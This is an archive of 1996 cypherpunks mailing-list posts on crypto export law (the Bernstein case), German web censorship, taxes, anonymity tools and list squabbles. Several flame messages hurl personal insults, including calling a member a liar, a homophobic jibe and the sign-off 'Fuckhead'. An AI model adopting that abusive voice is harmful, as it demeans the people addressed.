> Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of
> California.
> 
> More plan to offer BankNow-based services through AOL later this year:
> BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First
> Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon.
> 
> Unlike Quicken, BankNow software is available free to America Online
> subscribers.
> 
> Banks' fees will vary. First National Bank of Chicago said it will
> charge $3.95 a month for on-line banking and $9.95 a month for other
> services that include bill payment.
> 
> Centura Banks Inc. said it will offer on-line banking free, and charge
> $5.95 a month for bill payment.
> 
> Intuit officials declined to disclose what its Intuit Services Corp.
> processing unit will charge to handle these transactions for banks.
> 
> Some of Intuit's larger bank partners chose not to offer BankNow because
> they already promote their own PC banking programs.
> 
> For example, Citicorp, First Union, and Wells Fargo each support
> Quicken, but passed on BankNow. Instead, they are paying a premium for a
> "button" on America Online's banking screen that will eventually link
> users to a proprietary home banking program.
> 
> 
> 
> AP Online: Thursday, September 5, 1996
> 
> House Probes Money Laundering
> 
> By ROB WELLS
> 
> House Banking Committee members on Thursday urged a Treasury Department
> agency to step up its efforts to halt money laundering by Mexican drug
> lords.
> 
> Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement
> Network to put in place new regulations to plug a significant loophole
> that allows Mexico's drug dealers to place their ill-gotten profits back
> into the U.S.
> 
> Bachus, chairman of the House Banking oversight subcommittee, said
> Congress gave authority to FinCen in 1994 to put in place new rules that
> would prevent drug dealers from using foreign bank drafts, a type of
> check, to evade currency reporting restrictions.
> 
> ''That effort is long, long overdue,'' Bachus said.
> 
> Rep. Henry Gonzalez, D-Texas, asked the agency to provide further
> details about suspected money laundering in his home town of San
> Antonio, particularly the source of a $3 billion cash surplus in the San
> Antonio Federal Reserve Bank.
> 
> The issue arose as Bachus' panel began exploring the dramatic rise of
> narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the
> ease with which drug dealers can ship their profits to the south. Money
> laundering refers to the practice by which drug dealers, mobsters and
> others funnel their illegal profits into the banking system through
> businesses or other means.
> 
> Bachus said estimates of drug profits laundered through Mexico range
> from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's
> director, defended his agency's record, saying a combination of new
> rules and tougher enforcement in the past decade has ''made it more
> difficult to launder money in the U.S.'' and increased the costs of
> money laundering. Morris' agency enforces the Bank Secrecy Act, a key
> weapon against money laundering.
> 
> As for the new rules aimed at foreign bank drafts, Morris said the
> regulations are more difficult than first expected because such
> restrictions also could hinder legitimate commerce. He said the proposal
> would be released soon.
> 
> FinCen is working on other fronts to combat money laundering, which
> includes a new computer system that tallies bank fraud to help
> regulators gain an early warning of money laundering.
> 
> In addition, the Clinton Administration assisted Mexico in adopting new
> anti-money laundering rules earlier this year. And Treasury Secretary
> Robert Rubin convened a conference of 29 nations in December 1995 to
> focus on the money laundering problem.
> 
> One committee member, Rep. Maxine Waters, D-Calif., addressed the
> political context of the hearings.
> 
> Waters said she was suspicious that the Republican-led Congress was
> holding ''a rash of hearings this month ... on the subject of drugs just
> as Presidential candidate Dole tries to use the issue as part of his
> campaign strategy against President Clinton.''
> 
> Waters said if the GOP-led House ''is truly serious about the impact of
> drugs'' it should hold hearings about charges raised in a San Jose
> Mercury News investigative series last month concerning the role
> CIA-backed rebels in Nicaragua played in bringing crack cocaine and
> weapons to Los Angeles and other cities.
> 
> Bachus told Waters the hearing wasn't motivated by politics and that he
> had personally been involved in anti-drug efforts prior to his election
> to Congress.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 12:11:02 +0800
To: cypherpunks@toad.com
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <199609181415.AA21481@crl11.crl.com>
Message-ID: <yHLguD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From varange@crl.com  Wed Sep 18 10:24:36 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 11:07:12 EDT
	for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA18840 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:24:36 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA06256
  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:25:04 -0700
Received: by crl11.crl.com id AA21481
  (5.65c/IDA-1.5); Wed, 18 Sep 1996 07:15:24 -0700
From: Troy Varange <varange@crl.com>
Message-Id: <199609181415.AA21481@crl11.crl.com>
Subject: Re: A Bizarre Increase in the Ad Hominems Here
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 07:15:24 -0700 (PDT)
In-Reply-To: <TZ0FuD105w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:03:04 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1107      

> tcmay@got.net (Timmy May) (fart) writes:
> > * Detweiler (vznuri@netcom.com) writes:
> 
> Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy
> believes his own lies.
> 
> > (Sadly, a large fraction of the women who have posted on our list have
> > written in this same kind of incoherent, rambling, makes-no-sense kind of
> > style. I have no idea why the percentage of such events is so high.)
> 
> Is Timmy gay?  Why does he hate women so much?
> 
> > * And of course Vulis has been posting his "farting" messages far and wide.
> 
> Recently, 3 people in the computer security field have independently
> told me that Timmy May approached them "off-list" to complain about
> things I supposedly say on the Internet - most of which I never said.
> When I asked about it on this mailing list, Timmy posted what was shown
> to be a lie (about his complaint to Kelly Goen.) Timmy is known as a
> nutcase and a liar - if he keeps up his "character assassination"
> attacks, the only reputation he hurts is his own.
> 
> Dr.Dimitri Vulis KOTM
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 19 Sep 1996 10:14:41 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: Re: cypherpunk listserve usefulness
In-Reply-To: <v03007801ae65b79e711a@[207.79.65.35]>
Message-ID: <Pine.3.89.9609181209.A29790-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Chip Mefford wrote:
> 
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3 keywords
> have remarkably improved the usefulness of this listserve.
> 
[snip]
>
> I guess that makes me a censor and it has me reexamining some things.
> 

No, you're not a censor.  You are merely determining what *you* choose to 
read.  That's perfectly acceptable - probably a lot of people on this 
list also filter their messages to some extent.  Now, if you tried to 
force the rest of us to abide by the standards that you set for yourself, 
then you would be trying to censor us.  There is a big difference here.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 19 Sep 1996 06:44:01 +0800
To: "<pstira@escape.com>
Subject: Re: XPA_nix
In-Reply-To: <Pine.BSI.3.91.960917213231.5280C-100000@escape.com>
Message-ID: <199609181622.MAA14053@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"<pstira@escape.com>" writes:
> 
> On Thu, 12 Sep 1996, John Young wrote:
> 
> > Cheswick opines,"This is the first major attack of a kind that I believe to
> > be the final Internet security problem." 
> 
> Harrumph.  We should only BE so lucky.

I don't remember if Ches was quoted correctly, but its more or less
true -- we know how to deal with most classes of major problems, but
denial of service is still a major question mark. I suspect its the
last big frontier.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 19 Sep 1996 08:09:34 +0800
To: sjohnson@packetengines.com (stuart johnson)
Subject: Re: a simple cypher scheme
In-Reply-To: <9609180005.AA14720@ns.tsinet.com>
Message-ID: <199609181641.MAA14118@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



stuart johnson writes:
> a co-worker here has
> come up with a 'cypher' scheme that he would like to use to send code to our
> clients.  the scheme is this : he would take the file of code and pad all
> lines to the length of the longest line, he would then preform column swaps,
> and then row swaps, to 'mix up' the file. the person receiving the file
> would then preform the opposite functions to recover the file.  it seems so
> simple that it can't be good. i've convenced him to use pgp, but i would
> like some input if possible on why his cypher scheme is not a good one.

This is a variant on a scheme called a transposition cipher. It was
okay, but not very good, technology in the Civil War, when it was last
seriously used. It can be broken with a technique called multiple
anagramming.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 19 Sep 1996 10:05:49 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Spam blacklist project
In-Reply-To: <3.0b19.32.19960918112541.00a0bc48@panix.com>
Message-ID: <Pine.3.89.9609181254.A2912-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 18 Sep 1996, Duncan Frissell wrote:

> hallam@ai.mit.edu writes:
> 
> > Well if some people find it amazing that there are people out there
> > who agree with the 98.8% of people who did not vote Libertarian at the
> > last election then so be it.
> 
> Course half the eligible population didn't vote at all obviously favoring
> market and personal approaches over political methods of governance.  

Half the population doesn't care who their masters are, as long as they 
have masters that tell them what to do.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Myers W. Carpenter" <bmcarpenter@trevecca.edu>
Date: Thu, 19 Sep 1996 06:03:56 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Macintosh Mixmaster port...  Who's doing it?
Message-ID: <v03007806ae65f51d7702@[198.146.120.234]>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone have any idea who might be attempting a Macintosh
Mixmaster port?  I and some other people were eyeing the idea.  If you know
who might be doing this port I would appreciate hearing from them.
	Thanks.
			myers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Vagner <jlv@signet.sig.bsh.com>
Date: Thu, 19 Sep 1996 06:26:52 +0800
To: cypherpunks@toad.com
Subject: Re: Wealth Tax vs. Capital Gains Tax Reduction
In-Reply-To: <ae6440c1040210045195@[207.167.93.63]>
Message-ID: <Pine.SGI.3.95.960918132506.26365H-100000@www>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Timothy C. May wrote:

> 
> I've been thinking a lot about the prospects of a "wealth tax," or "asset
> tax," in the U.S. With the stock market averages at record levels (and,
> hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level),
> and with increasing fractions of people's overall net worth tied up in
> equities, bonds, houses, property, etc., it may be that the looters will
> take a more serious look at taxing people's overall wealth, e.g., the 5% of
> net worth per year that some countries have.

Forgive me if this is a stupid question, but could this lead to
"engineering" the market at particularly times of the year to decrease the
"official" value of an entity's value and complicating the pricing of
equities? Would this become a viable means for those with less wealth to
capitalize on the momentary "dip" in prices?

jlv





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 19 Sep 1996 06:11:58 +0800
To: dthorn@gte.net
Subject: Re: Snake-Oil FAQ
Message-ID: <9609181827.AA20470@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Dale Thorn <dthorn@gte.net> wrote:
> 
> Krenn wrote:
> > It would be nice to have a list of actual products which are deemed
> > potential snake-oil. Such a list could be maintained anonymously
> > through a nym to avoid all the annoying legal problems with commenting
> > on another's product. Though truth is the best defense against libel
> > charges, it would be very annoying to be sued or some such by some
> > hairbrained snake-oil peddler.
> 
> Think how much more annoying it would be if the shoe were on the other 
> foot.
> 

Libel/Slander is very different from doing a review.  Unfortunately,
in todays legal climate, it is way to easy to find a lawyer that
will harass someone for a negative review.  Unless you are 
prepared to fight such a legal battle, it is much easier to 
do anonymous reviews, and build up a reputation as a good reviewer
through use of signatures, etc.

If you have a good product, and get negative reviews, the truth
will come out eventually through other channels.  Either the product
really isn't good, or the reviewer loses his reputation and his messages
descend into the noise.

Thats life - deal with it!

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 10:00:40 +0800
To: cypherpunks@toad.com
Subject: Re: Wealth Tax vs. Capital Gains Tax Reduction
Message-ID: <ae65af15120210046341@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:27 PM 9/18/96, Jason Vagner wrote:
>On Tue, 17 Sep 1996, Timothy C. May wrote:
>
>>
>> I've been thinking a lot about the prospects of a "wealth tax," or "asset
>> tax," in the U.S. With the stock market averages at record levels (and,
>> hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level),
>> and with increasing fractions of people's overall net worth tied up in
>> equities, bonds, houses, property, etc., it may be that the looters will
>> take a more serious look at taxing people's overall wealth, e.g., the 5% of
>> net worth per year that some countries have.
>
>Forgive me if this is a stupid question, but could this lead to
>"engineering" the market at particularly times of the year to decrease the
>"official" value of an entity's value and complicating the pricing of
>equities? Would this become a viable means for those with less wealth to
>capitalize on the momentary "dip" in prices?

Certainly people would look for "loopholes" and mechanisms for reducing
their officially-calculated wealth, were such a wealth tax to be
implemented. For example, they might find ways to transfer their wealth to
trusts, corporations, foundations, etc., and then "use" this wealth by
hiring themselves as high-priced consultants, providing "company cars" and
"company yachts."

(Arguably this already happens, with such corporate perquisites considered
part of the compensation package for many highly-paid executives.)

As to whether there are schemes for reducing the valuation of equities only
at certain times of the year, I can't think of any that would have a
significant effect. Deals to sell stock at artificially low prices are
frowned upon. As are "parking" schemes.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felipe Rodriquez <felipe@xs4all.nl>
Date: Fri, 20 Sep 1996 08:23:57 +0800
To: leden-l@nlip.nl
Subject: Declaration against German censorship
Message-ID: <199609181150.NAA18038@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



Send a mail to tuamotu@duplox.wz-berlin.de to sign this declaration
against current German censorship and IP-filtering of sites.

------------------------------------------------------------------

A Letter of Protest

On August 30th 1996, the German Federal Prosecutor wrote to German
Internet providers and on-line services telling them that they could
possibly be charged with aiding and abetting persons who are currently
the subject of a preliminary inquiry by the German Federal Prosecutor
due to an article published in a magazine which offended German
anti-terrorism laws.

The German Federal Prosecutor wrote (excerpt): "Under the following
Internet addresses ... [the GFP names two WWW sites, which will be not
quoted here because we do not refer to the actual case of a specific
text which gives cause for complaint, instead we are interested in the
act of censorship as such] ..the complete issue is available... [of the
magazine who is subject of preliminary inquiry by the GFP. The GFP
explains why they deem the text to be illegal in Germany]... We want
you to be aware that you are possibly making yourself liable to
prosecution by acting as an accessory to criminal offences [according
to German anti-terrorist laws '' 129a,3 and 130a,1 StGB] if you allow
the text to be accessed via your Internet dial-ins and host computers."

Although the German Federal Prosecutor merely pointed out the
possibility of being liable to prosecution and although the opinion of
the GFP as expressed in the letter has not as of yet been proven right
by a court decision, several German providers responded to the letter
by temporarily (for no longer than 28 days) closing off the WWW sites
where the electronic version of the article was previously available to
Internet readers. From the point of view of a WWW site, for example
xs4all.nl in the Netherlands, the action of German providers (among
them the largest German providers) means a blockage of all of their WWW
information for a great number of German netizens because of a single
web page among the thousands of pages xs4all offers at their site. We
think denying access to WWW sites is wrong.

Beside the fact that it is practically impossible to filter the flow of
data in order to keep specific WWW pages which are stored on WWW sites
in other countries outside of the German state territory when Germans
are allowed to contact these countries by phone for example - unless
the German government decided upon massive censorship measurements
which would be not according to German Laws as they are today - we
demand equal rights for Internet providers and TelCo providers, thus
making the GFP's letter unsubstantiated if equal rights were applied.
So far, neither German Telecom nor the German postal service have been
liable to prosecution by acting as assessories to criminal offences by
simply transporting telephone or mail data.

xs4all and xs2all Internet Information! 

back to the letter of protest in german language 

Internet Information (available in English, Dutch, German):
http://www.xs4all.nl/~felipe/germany.html --- latest news 

Internet Information in German language http://www.spiegel.de/aktuell/sonv0296370906.html 
http://www.nadir.org/NA/Text/Archiv/Medien/Zeitschriften/radikal/netzzensur/
http://www.anwalt.de/ictf/mirror





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thumbnail <thumbnail@nym.alias.net>
Date: Thu, 19 Sep 1996 07:37:55 +0800
To: cypherpunks@toad.com
Subject: FCC Licensed Cypherpunks
Message-ID: <199609181800.OAA21782@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As someone pointed out recently, there's a lot of similarity between
the as-yet-unregulated Internet and the pre-FCC airwaves.  There were
even cypherpunk-analogs back then, who called themselves amateur radio
operators.  Where are they now?

Corralled into tiny slices of FCC-approved bandwidth.  Granted titles
of nobility by the government in recognition of their Morse code
prowess.  Eager to report pirate operators who don't play by the
rules, at least back when the FCC still investigated such complaints.

There lies the future: all those newbies wandering in with their
"Unbrakable Random Number Generator Encription Systemz" are going to
come back as Master Class Amateur Cryptography Operators, and by God
you'd better not laugh at their Internet Key Recovery Authority
certificates, if you know what's good for you.

Have a nice day.

- --Thumbnail

~~~
The PGP signature on this message is to certify that it was sent by
thumbnail@nym.alias.net on or before Wed Sep 18 18:00:48 1996 GMT.  The
administrators of nym.alias.net and the nym.alias.net PGP key in
no way endorse, approve of, or claim authorship of this message.
Report any abuse of this pseudonym service to admin@nym.alias.net.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkA40U5NDhYLYPHNAQGKZAf+ImZZXEAXdWdv1v30GFfguJ+1KWJRMsDD
uhDjuwyHfFVvKpJSyYr5nmBJLm41vvSXOIJnCtjzS7Ai+Y9tEnMUsY5Mg0Qp76LB
qvxDIgSB+S87xjSzWAx9Kur0SqRkyu3UZPqBniSKzUWIf9/dzu2ttnC0d+eCoBHZ
Vk8z8h6JsSU3G35djG7jrvVv4+Jg7VSIjFHvvfaJ528vcM+iUxiLWidIz1PPKmN4
r3dnjCsJql9akc2U013pFXzQV890bc2VEha5NQwxCPYS9L1oCZJfc5as5c6t0Xb7
AwoaZEhCt352TBQdeoLSE+5t+l3YvDSnmPr/HUWI+/bk27/XGhugTA==
=hmdh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 19 Sep 1996 06:03:56 +0800
To: tcmay@got.net
Subject: Re: The Near-Necessity of Health Insurance
Message-ID: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 18-SEP-1996 02:54:27.36

>Personally, I have not been a patient in a hospital in my entire adult
>life. Nor have I seen a doctor, except for a mandatory college physical in
>1970 and an insurance company physical in 1977. I just haven't broken any
>bones, had any serious illnesses, or felt the need to visit a doctor, an
>emergency room, or a walk-in clinic of any sort. I suppose I've been lucky.
>Also, I dislike hospitals and avoid doctors unless there seems to be a
>compelling need. So far, there has not been.

	While this is certainly your business, I would suggest at least
one physical a year, including blood work, as a good preventative measure...
I believe it _has_ been shown to extend lives; I can do a Medline lookup if
desired.

>In other words, the person who insures himself (through savings and
>investments) and who offers to pay for treatment out of his own funds, may
>be at a serious disadvantage. He pays the inflated rates for services, and
>may face delays in being admitted to a hospital.

[...]

>(Obviously the folks who use their insurance routinely, as one of my
>engineers once used to do (he'd take his kids to the hospital every time
>they sneezed), are being subsidized by those of us who avoid hospitals at
>all costs.)

	Actually, the major subsidy appears to be that employer-paid
health insurance isn't a taxable benefit. The status regarding self-insured
persons such as you is constantly changing, but they're looking at subsidizing
that also. Essentially, taxes paid by those with low or no employer-paid
health insurance are subsidizing those with high-cost employer-paid health
insurance.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 19 Sep 1996 11:11:20 +0800
To: cypherpunks@toad.com
Subject: Bernstein hearing: The Press Release
Message-ID: <199609182103.OAA22863@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


CRYPTO FACE-OFF AT HIGH-NOON

Judge Patel to Decide if Government Restrictions on 
Cryptography Violate the First Amendment

September 18, 1996

                                Electronic Frontier Foundation Contacts:

                                     Shari Steele, Staff Counsel
                                      301/375-8856, ssteele@eff.org

                                     John Gilmore, Founding Board Member
                                      415/221-6524, gnu@toad.com

                                     Cindy Cohn, McGlashan & Sarrail
                                      415/341-2585, cindy@mcglashan.com


San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall
Patel will hold hearings in a case with far-reaching implications for
personal privacy, U.S. competitiveness, and national security.  Mathematician 
Daniel J. Bernstein, a Research Assistant Professor in the Department of 
Mathematics, Statistics and Computer Science at the University of Illinois at 
Chicago, has sued several Federal agencies on the grounds that the 
agencies' requirement that he obtain a license prior to publishing his 
ideas about cryptography violates his First Amendment right to freedom 
of speech.

Cryptography is the science of secret writing.  It is the technology 
to use for providing privacy or proving authenticity over distances.  
All kinds of communications, from cellular phones to corporate or
government databases, depend on cryptography for protection.  The
security of computers against intruders, the privacy and integrity of
the Internet, ATM machines, satellite and cable TV, and the world
financial networks all depend on cryptographic protection.  In fact, 
the very future of the global Internet, especially as a tool for 
commerce, political organizing and scientific development of new ideas, 
depends upon the availability of strong encryption.

The U.S. government has restricted cryptography since it was useful in 
winning World War II.  However, cellular telephones, satellites, ATM 
machines, and the Internet did not exist in 1945; advances in 
communication and cheap computation have made cryptography useful in 
many new applications.  In addition, strong encryption is already 
available abroad, making laws restricting their export obsolete and 
damaging the ability of U.S. businesses to compete in overseas markets.  
In fact, Congress is currently considering three pieces
of legislation that would all update the export control laws and remove
encryption from its current place on the U.S. Munitions List.

While Washington toils with Pro-CODE and the other introduced bills, this 
hearing will examine the various legal tests that will determine
whether the export laws and regulations (the "ITAR") are
constitutional.  Professor Bernstein argues that they violate
the First Amendment in several different ways:

LEGAL ARGUMENTS

*       Any legal framework that allows a government bureaucrat to 
censor speech before it happens is an unconstitutional prior restraint.  
The government is not allowed to set up such a drastic scheme 
unless they can prove that publication of such information will 
"surely result in direct, immediate, and irreparable damage to our 
Nation or its people" and that the regulation at issue is necessary 
to prevent this damage.  The government must also tightly restrain 
the discretion given to the bureaucrats to ensure that they don't 
misuse this power.  The government has not met this burden 
regarding the ITAR legal framework. 

* 	Because restrictions on speech about cryptography are based on the
content of what is being said, the court must apply a strict scrutiny test
to determine whether individuals can be punished for engaging in this
speech.  This requires that the regulation be necessary to serve a
compelling state interest and that it is narrowly drawn to achieve that
end.  The ITAR regulatory scheme has adopted a too- restrictive approach,
by prohibiting many forms of speech in the area of cryptography. 

*       The ITAR regulatory framework lacks the necessary procedural
safeguards.  Grants of administrative discretion must be limited by clear
standards, and judicial review must be available.  "Quite simply, the ITAR
Scheme allows its administrative agencies to make inconsistent, incorrect
and sometimes incomprehensible decisions censoring speech, all without the
protections of judicial review or oversight." 

*       The ITAR framework is unconstitutionally vague.  The government
doesn't even seem to know what its regulations include and exclude!  Here, 
they told Professor Bernstein that he could not publish his academic paper 
for over three years, only changing their collective mind and withdrawing 
that decision after being sued.  The lack of standards has allowed the 
government to misuse a statute aimed at commercial, military arms sales 
to limit academic and scientific publication. 

*       The ITAR regulatory scheme is overbroad.  In an internal memo
written almost 20 years ago, the government's own Office of Legal Counsel
concluded that the ITAR's licensing standards "are not sufficiently
precise to guard against arbitrary and inconsistent administrative
action."  The OLC specifically warned that the coverage was so broad it
could apply to "communication of unclassified information by a technical
lecturer at a university or to the conversation of a United States
engineer who meets with foreign friends at home to discuss matters of
theoretical interest."  This is exactly what is happening here, and it is
unconstitutional. 


Judge Patel will hear arguments from attorneys for Bernstein and the
government concerning their respective motions for summary judgment.  The
hearing on Friday is scheduled for 12:00 noon at the United States
District Court for the Northern District of California, San Francisco
Headquarters, at 450 Golden Gate Avenue.  The hearing is open to the press
and to the public. 


CASE BACKGROUND


Bernstein completed the development of an "encryption algorithm" (a recipe 
or set of instructions) he calls "Snuffle."  In order to contribute Snuffle 
to the marketplace of scientific ideas, and to allow other scientists to 
evaluate and test his ideas, Bernstein wishes to publish (a) a paper in 
English describing and explaining the algorithm, (b) the "source code" for 
a computer program that uses the algorithm (this source code more 
precisely describes and implements the idea), and (c) instructions for how 
a person could use the source code and a computer to encrypt communications.  
He wishes to publish them in print journals as well as on the Internet. 
Bernstein also wishes to discuss these items at mathematical conferences, in
college classrooms, on the Internet, and in other open, public meetings.  In 
fact, he would like to use Snuffle as part of his course material for a 
cryptography class he will be teaching next spring.

The Arms Export Control Act and the International Traffic in Arms 
Regulations (the ITAR regulatory scheme) required Bernstein to submit 
his ideas about cryptography to the government for review, to register 
as an arms dealer, and to apply for and obtain from the government a 
license to publish his ideas.  Failure to do so would result in severe 
civil and criminal penalties.  Bernstein believes this is a violation 
of his First Amendment rights and has sued the government.

In the first phase of this litigation, the government argued that
since Bernstein's ideas were expressed, in part, in computer language
(source code), they were not protected by the First Amendment.  On
April 15, 1996, Judge Patel rejected that argument and held for the
first time that computer source code is protected speech for purposes
of the First Amendment.

Because of its far-reaching implications, the Bernstein case is being
watched closely by privacy advocates, the computer industry, the export
and cryptography communities, and First Amendment activists.  In fact,
several members of these communities provided declarations that were
submitted in support of Bernstein's motion. 


ABOUT THE ATTORNEYS

Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
McGlashan & Sarrail, who is offering her services pro bono.  Major
additional pro bono legal assistance is being provided by Lee Tien of
Berkeley; M. Edward Ross of the San Francisco law firm of Steefel, Levitt
& Weiss; James Wheaton and Elizabeth Pritzker of the First Amendment
Project in Oakland; and Robert Corn-Revere of the Washington, DC, law
firm of Hogan & Hartson.


ABOUT THE ELECTRONIC FRONTIER FOUNDATION

The Electronic Frontier Foundation (EFF) is a non-profit civil liberties
organization working in the public interest to protect privacy, free
expression, and access to online resources and information.  EFF is a
primary sponsor of the Bernstein case.  EFF helped to find Bernstein pro
bono counsel, is a member of the Bernstein legal team, and helped collect
members of the academic community and computer industry to support this
case. 

Full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives at

        http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michelle Thompson <mthompso@qualcomm.com>
Date: Thu, 19 Sep 1996 10:54:55 +0800
To: William Knowles <printing@explicit.com>
Subject: Re: Assassination Politics, is now Mercenarial Stuff
Message-ID: <2.2.32.19960918210414.00333c18@strange.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Michelle (me) Wrote:

>> I believe that with the breakdown of the traditional sense of sovereignty,
>> mercenary activity, whether military or commercial in nature, will increase.
>> Engineering seems to be quite mercenary already, and very international.
>> Marketing and advertising, to a novice (me), seem to be going the same way.

At 04:40 PM 9/17/96 -0500, you wrote:

>Depends on what you would qualify as being mercenary work, Would Americans
>working on North Sea oil platforms getting paid $70,000+ a year tax free
>be considered a mercenary? 

Yes.

Reason: A mercenary is generally held to be someone that serves merely for
wages or the adventure. (or taking the narrow definition, a soldier hired
into foreign service.) Working on a North Sea oil platform seems to be
something done primarily for the wages and/or the adventure. However, the
qualification is to what degree does that American depend on the
organization operating the rig? Just a little bit? Mercenary. A lot? Employee. 

The distinction between mercenary and employee, to me anyways, is directly
related to the level of dependence the individual has on the group that's
paying him/her.

>Or going down to the islands and opening a data haven? 

Yes.

Reason: This is much closer to pure mercenary than the former example. This
is truly free-lance. There is no oil company paycheck nor is there
day-to-day direction in what should or could be done that day at the data
haven. 

However, you are under the influence of the legalities of the island, no?
You stand a chance of being assimilated into the legal culture. Your data
haven could become an institution, and therefore become used as an extension
of that island's political presense. All very intriguing.

>Or maybe being the engineer for the Sultan of Brunei?

No, not really.

In taking the "position" of engineer, you fall into the role of foreign
consultant rather than mercenary. You are assimilated to a degree that would
preclude the independence enjoyed by the mercenary. 

Contract for a "project" for the Sultan of Brunei, and yes, mercenary you
could then be. 

>Hired Gun Since 1992!

Wow.


-Michelle





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 19 Sep 1996 06:19:38 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 17 Sept 1996
Message-ID: <01I9MKS1EDY68Y4YUZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu" 18-SEP-1996 05:39:23.00

>************************************************************
>Edupage, 17 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>************************************************************

>THE BOTTOM LINE ON ELECTRONIC LIBRARIES
>A former Public Library Association official estimates the cost of wiring
>the nation's libraries at somewhere between $2- and $3-billion -- "a sum
>nearly equivalent to that spent by the philanthropist Andrew Carnegie during
>the great spurt of library building," notes journalist Nicholas von Hoffman.
